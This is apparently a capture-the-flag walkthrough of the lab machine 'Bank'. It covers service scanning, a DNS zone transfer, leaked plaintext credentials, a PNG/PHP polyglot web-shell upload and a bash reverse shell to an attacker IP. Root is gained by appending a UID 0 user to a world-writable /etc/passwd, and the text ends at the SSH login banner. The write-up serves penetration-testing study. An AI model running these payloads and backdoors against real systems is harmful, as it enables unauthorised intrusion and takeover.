Let's port-scan the target to see which services are exposed and where an opening might be. The scan skips host discovery (-Pn), runs the default scripts with version detection (-sCV) over every TCP port, reports only open ports (--open) and saves normal output to bank.nmap.
# Nmap 7.94 scan initiated Sun Nov 12 02:18:04 2023 as: nmap -vvv -Pn -sCV --open -T4 -p0-65535 -oN bank.nmap 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up, received user-set (0.33s latency).
Scanned at 2023-11-12 02:18:04 EST for 84s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| ssh-dss …
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
|   256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh
53/tcp open  domain  syn-ack ttl 63 ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 12 02:19:28 2023 -- 1 IP address (1 host up) scanned in 83.86 seconds
The scan shows three open TCP ports on 10.10.10.29. Breakdown:
SSH (22/tcp):
State: open
Service: OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (protocol 2.0)
Host key types offered: DSA (1024-bit), RSA (2048-bit), ECDSA (256-bit), ED25519
Operating system: Ubuntu Linux
SSH gives us a way in later if we obtain credentials. The package revision (2ubuntu2.8) is the Ubuntu 14.04 build of OpenSSH, so this is a Trusty-era system; the login banner at the end of this write-up confirms Ubuntu 14.04.5 LTS. The 1024-bit DSA host key is a further sign of age: OpenSSH clients have refused ssh-dss by default since 7.0.
DNS (53/tcp):
State: open
Service: domain, ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux); the dns-nsid script also reads the version string from the server (bind.version: 9.9.5-3ubuntu0.14-Ubuntu)
An authoritative name server on the target means the zone for the lab domain may be served from here, so a zone transfer is the first thing to try (next section). Exposing the version string is minor information disclosure; BIND can suppress it with the version option in named.conf.
HTTP (80/tcp):
State: open
Service: Apache httpd 2.4.7 (Ubuntu); Server header Apache/2.4.7 (Ubuntu)
Supported methods: POST, OPTIONS, GET, HEAD
Title: Apache2 Ubuntu Default Page: It works
Browsing by IP returns the stock Ubuntu placeholder page, which suggests the real application sits behind a name-based virtual host. That is another reason to get the hostnames out of DNS.
Additional information:
Latency: 0.33 s round-trip, normal for a VPN lab link.
Operating system: Linux (CPE cpe:/o:linux:linux_kernel), inferred from service banners; no -O fingerprinting was run.
Three services, all on Ubuntu 14.04-era packages: SSH for later access, DNS to enumerate hostnames, and HTTP for the application itself.
DNS
dig
With the standard dig tool available on Linux, we can run the following DNS recon against the target. The zone name bank.htb follows the HTB naming convention; the SOA and NS answers below confirm that the server is authoritative for it, and the fact that it answers an AXFR from an arbitrary client at all is the misconfiguration (a properly configured BIND limits zone transfers to its secondaries with allow-transfer).
# get the domain's zone details with dig from the target's DNS server
$ dig @10.10.10.29 bank.htb axfr

; <<>> DiG 9.19.17-1-Debian <<>> @10.10.10.29 bank.htb axfr
; (1 server found)
;; global options: +cmd
bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.        604800  IN  NS     ns.bank.htb.
bank.htb.        604800  IN  A      10.10.10.29
ns.bank.htb.     604800  IN  A      10.10.10.29
www.bank.htb.    604800  IN  CNAME  bank.htb.
bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 504 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Sun Nov 12 02:49:32 EST 2023
;; XFR size: 6 records (messages 1, bytes 171)
-------------------------------------------------------------------------------
# filter the output a bit more with a grep regex
$ dig @10.10.10.29 bank.htb axfr | grep -E '(\w+\.)?\w+\.htb'
; <<>> DiG 9.19.17-1-Debian <<>> @10.10.10.29 bank.htb axfr
bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.        604800  IN  NS     ns.bank.htb.
bank.htb.        604800  IN  A      10.10.10.29
ns.bank.htb.     604800  IN  A      10.10.10.29
www.bank.htb.    604800  IN  CNAME  bank.htb.
bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
-------------------------------------------------------------------------------
# print only the matches with grep -o
$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb'
bank.htb
bank.htb
bank.htb
chris.bank.htb
bank.htb
ns.bank.htb
bank.htb
ns.bank.htb
www.bank.htb
bank.htb
bank.htb
bank.htb
chris.bank.htb
-------------------------------------------------------------------------------
# sort and print only unique names with sort -u
$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u
bank.htb
chris.bank.htb
ns.bank.htb
www.bank.htb
-------------------------------------------------------------------------------
# translate newlines \n to spaces ' '
$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u | tr '\n' ' '
bank.htb chris.bank.htb ns.bank.htb www.bank.htb
-------------------------------------------------------------------------------
# shape the output into an /etc/hosts line with awk
$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u | tr '\n' ' ' | awk '{print "10.10.10.29\t" $1 " " $2 " " $3 " " $4}'
10.10.10.29	bank.htb chris.bank.htb ns.bank.htb www.bank.htb
-------------------------------------------------------------------------------
# copy the output to the clipboard with xclip instead of printing it
$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u | tr '\n' ' ' | awk '{print "10.10.10.29\t" $1 " " $2 " " $3 " " $4}' | xclip -selection clipboard
The series of commands retrieves the zone with dig, narrows the output with grep, sort and tr, shapes it with awk, and finally copies it to the clipboard with xclip. Step by step:
Zone transfer with dig:
dig @10.10.10.29 bank.htb axfr asks the target's name server for a full zone transfer (AXFR) of bank.htb. The zone is small: an SOA, one NS (ns.bank.htb), A records for bank.htb and ns.bank.htb, and a www CNAME, all pointing at 10.10.10.29.
Filter with grep -E:
grep -E '(\w+\.)?\w+\.htb' keeps only lines containing a .htb name. That still includes the DiG banner line, because it echoes the query.
Matches only with grep -o:
grep -oE ... prints just the matched names, one per line, so a line with several names (owner name plus the SOA fields) yields several matches.
Dedupe with sort -u:
Four distinct names remain: bank.htb, chris.bank.htb, ns.bank.htb and www.bank.htb.
Join with tr:
tr '\n' ' ' puts them on a single line.
Shape with awk:
awk prefixes the line with the server IP and a tab, producing an /etc/hosts entry. $1 to $4 are spelled out because there happen to be four names; awk '{print "10.10.10.29\t" $0}' would do the same for any count.
Copy with xclip:
xclip -selection clipboard sends the line to the clipboard instead of the terminal.
One caveat about the fourth name: chris.bank.htb is not a host. It comes from the SOA record's RNAME field, which stores the zone contact's mailbox with the @ written as a dot, so it really reads chris@bank.htb. It has no A record in the zone and only resolves later because of the hosts entry. It is still worth keeping: it is a username hint, and it matches the account found further down.
To make my life a bit easier when working with the virtual hosts, I add the line produced by the awk pipeline above (10.10.10.29 followed by the four names) to my local Kali machine's /etc/hosts file.
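To script what the pipeline above does by hand, here is an added shell example (my own, not part of the original write-up or of any tool it uses). It reads raw dig axfr output, builds the hosts line from A and CNAME records only, and decodes the SOA RNAME into a mailbox. The zone text embedded below is copied from the transfer shown above so the script runs offline; the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example: derive an /etc/hosts line and the admin mailbox from a zone transfer.
# Input is the record section of `dig @server zone axfr` (RR lines; comment lines are ignored).
# SAMPLE_AXFR is the zone shown in the write-up, reproduced here so the script runs offline.
SAMPLE_AXFR='bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.        604800  IN  NS     ns.bank.htb.
bank.htb.        604800  IN  A      10.10.10.29
ns.bank.htb.     604800  IN  A      10.10.10.29
www.bank.htb.    604800  IN  CNAME  bank.htb.
bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800'

# One hosts line per address: "<ip> <name> <name> ...", names sorted.
# Only A records (and CNAMEs whose target has an A record in the zone) become hosts
# entries; the SOA RNAME is deliberately left out because it is a mailbox, not a host.
axfr_to_hosts() {
    awk '/^;/ { next }
         $4 == "A"     { a[$1] = $5 }
         $4 == "CNAME" { c[$1] = $5 }
         END {
             for (n in c) if (c[n] in a) a[n] = a[c[n]]
             for (n in a) { h = n; sub(/\.$/, "", h); print a[n], h }
         }' |
    sort |
    awk '$1 != ip { if (ip != "") print line; ip = $1; line = $1 }
         { line = line " " $2 }
         END { if (ip != "") print line }'
}

# The SOA RNAME encodes the responsible mailbox with "@" written as the first dot:
# "chris.bank.htb." is chris@bank.htb. (A literal dot in the local part would appear
# escaped as "\." in dig output; that case is not handled here.)
soa_rname_to_email() {
    awk '/^;/ { next }
         $4 == "SOA" { r = $6; sub(/\.$/, "", r); sub(/\./, "@", r); print r; exit }'
}

printf '%s\n' "$SAMPLE_AXFR" | axfr_to_hosts
printf '%s\n' "$SAMPLE_AXFR" | soa_rname_to_email
```

Against a live server the same functions take the real transfer: dig @10.10.10.29 bank.htb axfr | axfr_to_hosts. The hosts line this produces omits chris.bank.htb, which is the point of separating RNAME handling from host extraction.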
WhatWeb
Running WhatWeb, a command-line web fingerprinting tool, against http://10.10.10.29 gives the following:
URL: http://10.10.10.29
Status: 200 OK, the request was served without error.
Apache [2.4.7]: the web server software and version, matching the Nmap banner.
Country: RESERVED [ZZ]: WhatWeb's GeoIP lookup of the address. 10.0.0.0/8 is RFC 1918 private space, so no country is assigned and the reserved code ZZ is shown.
HTTPServer: Ubuntu Linux [Apache/2.4.7 (Ubuntu)]: the Server header; the "(Ubuntu)" suffix identifies the distribution's package build of Apache and, by implication, the operating system.
IP: 10.10.10.29: the resolved address.
Title: Apache2 Ubuntu Default Page: It works: the placeholder page Ubuntu ships, served when the request does not match any configured virtual host.
WhatWeb therefore adds nothing beyond Nmap: Apache 2.4.7 on Ubuntu, serving only the default page on the bare IP. The application is expected behind the bank.htb names, which is why the hosts entry above matters.
Aquatone
# download aquatone from github
$ wget https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip
# unzip the zip file
$ unzip aquatone_linux_amd64_1.7.0.zip
# save the zone-transfer host list to bank.urls for aquatone
$ dig @10.10.10.29 bank.htb axfr | grep -oE '(\w+\.)?\w+\.htb' | sort -u > bank.urls
# it looks like this
$ cat bank.urls
bank.htb
chris.bank.htb
ns.bank.htb
www.bank.htb
# use sed to prepend http:// to every line in place
$ sed -i 's/^/http:\/\//gi' bank.urls
# verify the sed output
$ cat bank.urls
http://bank.htb
http://chris.bank.htb
http://ns.bank.htb
http://www.bank.htb
# feed it to aquatone
$ cat bank.urls | ./aquatone
aquatone v1.7.0 started at 2023-11-12T04:24:36-05:00

Using unreliable Google Chrome for screenshots. Install Chromium for better results.

Targets    : 4
Threads    : 2
Ports      : 80, 443, 8000, 8080, 8443
Output dir : .

http://ns.bank.htb: 200 OK
http://www.bank.htb: 200 OK
http://bank.htb: 200 OK
http://chris.bank.htb: 200 OK
http://ns.bank.htb: screenshot successful
http://www.bank.htb: screenshot successful
http://bank.htb: screenshot successful
http://chris.bank.htb: screenshot successful
Calculating page structures... done
Clustering similar pages... done
Generating HTML report... done
Writing session file...
Time:
 - Started at  : 2023-11-12T04:24:36-05:00
 - Finished at : 2023-11-12T04:24:43-05:00
 - Duration    : 7s

Requests:
 - Successful : 4
 - Failed     : 0

 - 2xx : 4
 - 3xx : 0
 - 4xx : 0
 - 5xx : 0

Screenshots:
 - Successful : 4
 - Failed     : 0

Wrote HTML report to: aquatone_report.html
# open aquatone_report.html with firefox
$ firefox aquatone_report.html &
Aquatone takes a list of hosts or URLs, requests each one, takes a screenshot and clusters similar pages into an HTML report. Step by step:
Download and unpack:
wget fetches the v1.7.0 release archive from GitHub and unzip extracts the aquatone binary.
Build the target list:
The zone transfer is filtered and deduplicated exactly as before, but redirected to bank.urls instead of the clipboard. sed -i then prepends http:// to every line in place.
Run it:
cat bank.urls | ./aquatone. Because each input line is a full URL, aquatone requests exactly those four URLs (Targets: 4, Requests: 4); the port list it prints (80, 443, 8000, 8080, 8443) is what it would probe for bare hostnames or IPs. The warning about "unreliable Google Chrome" means screenshots may be flaky; installing Chromium fixes that.
Review:
firefox aquatone_report.html & opens the report.
All four names resolve to 10.10.10.29 through the hosts entry, so all four return 200 OK. The useful part of the report is the clustering, which shows which Host headers reach a distinct virtual host and which simply fall through to the Apache default site.
Gobuster
Directory brute-forcing with Gobuster 3.6 against http://bank.htb. Gobuster can brute-force URIs (directories and files), DNS subdomains, virtual host names, open S3 and Google Cloud buckets and TFTP servers; here it is used in its directory mode. The finding that matters:
/balance-transfer: redirects to http://bank.htb/balance-transfer/
A redirect that only adds a trailing slash is Apache's DirectorySlash behaviour and reliably identifies a directory. Gobuster also listed uploads and assets along with their status codes and sizes. Two of these deserve a closer look: balance-transfer, which turns out to have directory listing enabled (see Analysis below), and uploads, a location under the web root that the application writes user-supplied files to.
Nuclei
Nuclei was run against the same four targets in bank.urls. Walking through the output:
Version and templates:
Nuclei v3.0.2 with nuclei-templates v9.6.9; 7278 templates loaded (signed and unsigned), clustered into 1252 clusters, which removed 4876 redundant requests.
Targets and Interactsh:
The four URLs from bank.urls are loaded. An Interactsh server at oast.live is used for out-of-band (DNS/HTTP callback) detections.
Fingerprinting:
Supported HTTP methods POST, OPTIONS, GET and HEAD; web server Apache/2.4.7 on Ubuntu, consistent with Nmap and WhatWeb.
Findings:
Missing security headers (X-Frame-Options, Content-Security-Policy, Strict-Transport-Security). Informational: worth a line in a report, not a foothold.
A WEB-INF/web.xml exposure match tagged CVE-2021-28164. Treat this as a probable false positive until confirmed by hand: that CVE is an Eclipse Jetty path-normalisation bug, and this host runs Apache httpd. Request the path yourself and look at what actually comes back before reporting it.
SSH: password authentication is enabled and the offered authentication methods are listed. This becomes relevant at the end, where a password login with a planted account is what turns a writable /etc/passwd into root.
Caveat on coverage:
Nuclei reported skipping www.bank.htb, ns.bank.htb, chris.bank.htb and bank.htb after repeated request failures. Once a host is skipped, the remaining templates are not run against it, so the results above are partial. Re-run with a lower request rate (-rate-limit) or a higher error threshold (-max-host-error) before treating the list as complete.
Nuclei is useful for broad, fast coverage; in this case the real finding came from manual enumeration of the directory listing below.
Analysis
# number of lines mentioning .acc (one per report file)
$ curl -sL http://bank.htb/balance-transfer | grep -i '.acc' | wc -l
999
-------------------------------------------------------------------------------
# number of lines not mentioning .acc
$ curl -sL http://bank.htb/balance-transfer | grep -iv '.acc' | wc -l
15
-------------------------------------------------------------------------------
# get the first 10 lines after sorting on the second field (size)
$ curl -sL http://bank.htb/balance-transfer | grep -i '.acc' | grep -ioE '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d '>' -f1,7 | tr '">' ' ' | sort -k2 | head
68576f20e9732f1b2edc4df5b8533230.acc  257
09ed7588d1cd47ffca297cc7dac22c52.acc  581
941e55bed0cb8052e7015e7133a5b9c7.acc  581
052a101eac01ccbf5120996cdc60e76d.acc  582
0d64f03e84187359907569a43c83bddc.acc  582
10805eead8596309e32a6bfe102f7b2c.acc  582
20fd5f9690efca3dc465097376b31dd6.acc  582
346bf50f208571cd9d4c4ec7f8d0b4df.acc  582
70b43acf0a3e285c423ee9267acaebb2.acc  582
780a84585b62356360a9495d9ff3a485.acc  582
-------------------------------------------------------------------------------
# stats on the byte sizes
$ curl -sL http://bank.htb/balance-transfer | grep -i '.acc' | grep -ioE '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d '>' -f1,7 | tr '">' ' ' | cut -d ' ' -f3 | sort | uniq -c
      1 257
      2 581
     11 582
     97 583
    590 584
    298 585
-------------------------------------------------------------------------------
# get the one file of 257 bytes
$ curl -sL http://bank.htb/balance-transfer | grep -i '.acc' | grep -ioE '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d '>' -f1,7 | tr '">' ' ' | grep -iE '\b257\b'
68576f20e9732f1b2edc4df5b8533230.acc  257
-------------------------------------------------------------------------------
# check out the file
$ curl -sL http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803.
===UserAccount===
-------------------------------------------------------------------------------
# record the creds
$ vi creds.txt
chris@bank.htb:!##HTBB4nkP4ssw0rd!##
-------------------------------------------------------------------------------
# now log in with the username and password at http://bank.htb
# you should be able to log in to the account
# Start looking for the place to upload files, since we know there is an uploads directory.
# Go to the Support page in Chris's account and test-upload a random PNG file while Burp Suite intercepts the traffic. It will capture the request and response for the upload.
-------------------------------------------------------------------------------
# craft the request so that the file body starts with the PNG magic bytes (the first three lines) and carries the PHP code below. Turn on "Show non-printable chars" (\n) in Burp to see the same output.
<?php system($_REQUEST["cmd"]); ?>
-------------------------------------------------------------------------------
# with further enumeration, check the source of the bank.htb/support.php page and find a DEBUG block in it:
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
This is a series of actions against the directory listing at http://bank.htb/balance-transfer. Step by step:
Counting report files:
curl fetches the index HTML; grep -i '.acc' keeps the lines mentioning .acc (the unescaped dot is loose but harmless here) and wc -l counts them: 999 report files.
Counting the rest:
The inverse grep gives 15 lines. These are not files but the HTML scaffolding of the index page (headers, table markup, the parent-directory link).
Names and sizes:
The second grep -o pulls each row from the 32-hex-character file name to the size cell, cut -d '>' -f1,7 keeps the name and the size cell (the field numbers depend on the exact tag layout of Apache's table-style index), tr strips the quotes and angle brackets, and sort -k2 orders by the size column. head shows the first ten.
Size statistics:
cut -d ' ' -f3 isolates the size and sort | uniq -c counts how many files have each size: one file of 257 bytes, two of 581, eleven of 582, 97 of 583, 590 of 584 and 298 of 585.
The outlier:
998 reports are within a few bytes of each other, which is what you expect from records of the same shape that have all been encrypted. One file is less than half that size. grep -E '\b257\b' names it: 68576f20e9732f1b2edc4df5b8533230.acc.
Reading it:
The file begins with --ERR ENCRYPT FAILED and then contains the record in plaintext: full name, email, password, card and transaction counts, balance. The encryption step failed for this one record and the application stored the plaintext anyway; the size distribution was the tell.
Recording the credentials:
chris@bank.htb with the password !##HTBB4nkP4ssw0rd!## goes into creds.txt.
Logging in:
The credentials work on http://bank.htb.
Finding the upload:
Gobuster found an uploads directory, so the Support page in Chris's account, which accepts file attachments, is the natural place to look. Upload a throwaway PNG with Burp Suite intercepting to capture the request and response.
Crafting the upload:
The request body is edited so that it starts with the PNG signature bytes, to get past checks on the file's content, and carries the one-line PHP shell <?php system($_REQUEST["cmd"]); ?> after them.
Source inspection:
The HTML source of support.php contains a leftover DEBUG comment saying that the .htb extension was mapped to execute as PHP for debugging. That comment is the missing piece: a file named with the .htb extension, once it lands in the web-reachable uploads directory, is run by the PHP handler regardless of what its first bytes look like.
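The grep/cut pipeline above is tied to the exact tag layout of the Apache index page (it counts '>' characters). The following added shell example (mine, not part of the original write-up) does the same job anchored on the href and align="right" attributes instead, and then reports the files whose size is rarest in the listing, which is exactly how the 257-byte report stood out from the other 998. The three-row listing embedded below is a constructed fragment in Apache's table-style autoindex format, not the real page.

```shell
#!/bin/sh
# Added example: find size outliers in an Apache autoindex directory listing.
# SAMPLE_INDEX is a constructed three-row fragment in the table (FancyIndexing) layout.
SAMPLE_INDEX='<tr><td valign="top"><a href="09ed7588d1cd47ffca297cc7dac22c52.acc">09ed7588d1cd47ffca297cc7dac22c52.acc</a></td><td align="right">2017-06-14 20:13  </td><td align="right">581 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><a href="68576f20e9732f1b2edc4df5b8533230.acc">68576f20e9732f1b2edc4df5b8533230.acc</a></td><td align="right">2017-06-14 20:13  </td><td align="right">257 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><a href="941e55bed0cb8052e7015e7133a5b9c7.acc">941e55bed0cb8052e7015e7133a5b9c7.acc</a></td><td align="right">2017-06-14 20:13  </td><td align="right">581 </td><td>&nbsp;</td></tr>'

# Print "<name> <size>" for each .acc row. The greedy .* before align="right" makes sed
# anchor on the last such cell (the size) and skip the date cell, whose text does not
# match the size pattern. Sizes keep Apache's human-readable suffix (K, M) if present.
listing_sizes() {
    sed -n 's/.*href="\([^"]*\.acc\)".*align="right">\([0-9.]*[KMG]*\) *<.*/\1 \2/p'
}

# "count size" histogram, least common size first.
size_histogram() {
    awk '{ print $2 }' | sort | uniq -c | sort -n
}

# Files whose size occurs least often in the listing. With hundreds of uniformly sized
# encrypted reports, a single file of a different size is the one worth reading first.
rarest_files() {
    awk '{ cnt[$2]++; name[NR] = $1; sz[NR] = $2 }
         END {
             min = -1
             for (s in cnt) if (min < 0 || cnt[s] < min) min = cnt[s]
             for (i = 1; i <= NR; i++) if (cnt[sz[i]] == min) print name[i], sz[i]
         }'
}

printf '%s\n' "$SAMPLE_INDEX" | listing_sizes | size_histogram
printf '%s\n' "$SAMPLE_INDEX" | listing_sizes | rarest_files
```

Against the live listing the same functions take the page as input: curl -sL http://bank.htb/balance-transfer/ | listing_sizes | rarest_files. Sizes are compared as strings, so a listing that mixes plain byte counts with K or M suffixes still works for the histogram but should not be sorted numerically.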
# or you can simply create implant.png.htb containing the following PHP code
<?php system($_REQUEST["cmd"]); ?>
-------------------------------------------------------------------------------
# verify with curl that PHP code execution works
$ curl http://bank.htb/uploads/implant.png.htb?cmd=whoami
www-data
-------------------------------------------------------------------------------
# same thing with the command in the POST body (keeps it out of the request line in the access log)
$ curl http://bank.htb/uploads/implant.png.htb --data-urlencode 'cmd=whoami'
www-data
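Building the upload by hand in Burp works, but it helps to have a reproducible file and a check that it really carries the PNG signature a content check would look at. This added shell example (not from the write-up) writes the same one-line PHP shell shown above behind the eight PNG signature bytes and verifies both halves; it is mine, and the file name implant.png.htb and the target path are taken from this write-up rather than from anything the example knows about the server.

```shell
#!/bin/sh
# Added example: build and verify a PNG/PHP polyglot for the .htb upload trick.
# The PNG signature (8 bytes) satisfies a magic-byte check; the rest is the one-line PHP
# shell from the write-up, which Apache only runs because .htb is mapped to PHP on the target.

# 89 50 4e 47 0d 0a 1a 0a as octal escapes, which POSIX printf understands (\x does not work in dash).
PNG_SIGNATURE='\211PNG\r\n\032\n'
PHP_SHELL='<?php system($_REQUEST["cmd"]); ?>'

# Emit the polyglot bytes on stdout: signature, a newline, then the PHP payload.
make_polyglot() {
    printf "$PNG_SIGNATURE"
    printf '\n%s\n' "$PHP_SHELL"
}

# First 8 bytes of stdin as lowercase hex with no separators.
first8_hex() {
    od -An -tx1 -N8 | tr -d ' \n'
}

# Succeeds if stdin starts with the PNG signature (what a magic-byte upload check sees).
has_png_signature() {
    [ "$(first8_hex)" = "89504e470d0a1a0a" ]
}

# Succeeds if the PHP open tag survived after the binary header.
has_php_tag() {
    grep -q '<?php'
}

make_polyglot | has_png_signature && echo "PNG signature present"
make_polyglot | has_php_tag && echo "PHP payload present"
```

Usage: make_polyglot > implant.png.htb, upload it through the Support page, then curl http://bank.htb/uploads/implant.png.htb --data-urlencode 'cmd=id'. A check that only reads magic bytes (the file utility, or PHP's finfo) accepts this file as image/png; checking the extension against an allow-list, storing uploads outside the document root, or simply not mapping extra extensions to the PHP handler would each have stopped it.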
pwncat
# reverse shell with the curl command below
$ curl http://bank.htb/uploads/implant.png.htb --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.3/443 0>&1"'
-------------------------------------------------------------------------------
# install pwncat
$ sudo apt install pwncat -y
-------------------------------------------------------------------------------
# pwncat listening on 443; you get the foothold as the www-data user
$ pwncat -l 443
bash: cannot set terminal process group (1071): Inappropriate ioctl for device
bash: no job control in this shell
-------------------------------------------------------------------------------
# use find to look for unusual SUID binaries
# /var/htb/bin/emergency is the obvious one in the list
www-data@bank:/var/www/bank/uploads$ find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
-------------------------------------------------------------------------------
# /etc/passwd is writable by everyone on the box
www-data@bank:/var/www/bank/uploads$ ls -l /etc/passw
-rw-rw-rw- 1 root root 1252 May 28  2017 /etc/passwd
-------------------------------------------------------------------------------
# check the sshd config for any attack surface
$ grep PermitRootLogin /etc/ssh/sshd_config
#PermitRootLogin without-password
PermitRootLogin yes
# the commented line is the stock Ubuntu default; the active setting is "yes"
This sequence turns code execution on the web server into an interactive foothold and then surveys the box for privilege-escalation candidates. Step by step:
Reverse shell:
The same POST to the implant runs bash -c "bash -i >& /dev/tcp/10.10.16.3/443 0>&1", a bash-only construct that opens a TCP connection to the attacker (10.10.16.3, port 443) and attaches the interactive shell's stdin, stdout and stderr to it. Port 443 is a common choice because outbound HTTPS is rarely filtered.
Listener:
sudo apt install pwncat installs the Kali/Debian pwncat package, which is the netcat-style tool by cytopia (not the pwncat-cs post-exploitation framework, which comes from pip). pwncat -l 443 listens and receives the shell as www-data. The "cannot set terminal process group" and "no job control" messages are normal for a shell without a tty.
SUID binaries:
find / -perm -u=s -type f 2>/dev/null lists every file with the setuid bit. Most entries are the expected distribution binaries under /usr/bin, /usr/lib and /bin (passwd, sudo, mount, ping and so on). /var/htb/bin/emergency is the odd one out: a custom binary in /var with SUID set, which makes it the first candidate to examine.
/etc/passwd permissions:
ls -l shows -rw-rw-rw-, world-writable. Anyone on the box can append a passwd entry, including one with UID 0.
sshd configuration:
grep shows the commented stock default (#PermitRootLogin without-password) and the active setting PermitRootLogin yes. This is what makes the passwd trick usable over SSH: sshd applies PermitRootLogin to any account whose UID is 0, not only the one named root, so with the default without-password a password login for a planted UID 0 user would be refused, while yes allows it.
Two independent routes to root follow from this survey, and both are worked through in the next section.
Exploits
Writable /etc/passwd
# on the remote machine, generate an MD5-crypt password hash with openssl
www-data@bank:/var/www/bank/uploads$ openssl passwd -1 'P@ssword1!'
$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0
-------------------------------------------------------------------------------
# append your own user with UID 0 / GID 0 to /etc/passwd
$ echo 'tyla:$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0:0:0:gotcha:/root:/bin/bash' >> /etc/passwd
-------------------------------------------------------------------------------
# verify the entry in /etc/passwd; it will be the last line
www-data@bank:/var/www/bank/uploads$ cat /etc/passwd
...
tyla:$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0:0:0:gotcha:/root:/bin/bash
-------------------------------------------------------------------------------
# now ssh as that user and you are root
$ ssh tyla@bank.htb
The authenticity of host 'bank.htb (10.10.10.29)' can't be established.
ED25519 key fingerprint is SHA256:7S4JgORJLloHIy/gCCkxvRpbrpWXAlMs8QK2jFtpn/w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bank.htb' (ED25519) to the list of known hosts.
tyla@bank.htb's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-79-generic i686)

  System information as of Sun Nov 19 10:00:07 EET 2023

  System load: 0.4               Processes:           84
  Memory usage: 4%               Usage of /:          7.4% of 28.42GB
  Swap usage: 0%                 Users logged in:     0

  Graph this data and manage this system at:
    https://landscape.canonical.com/
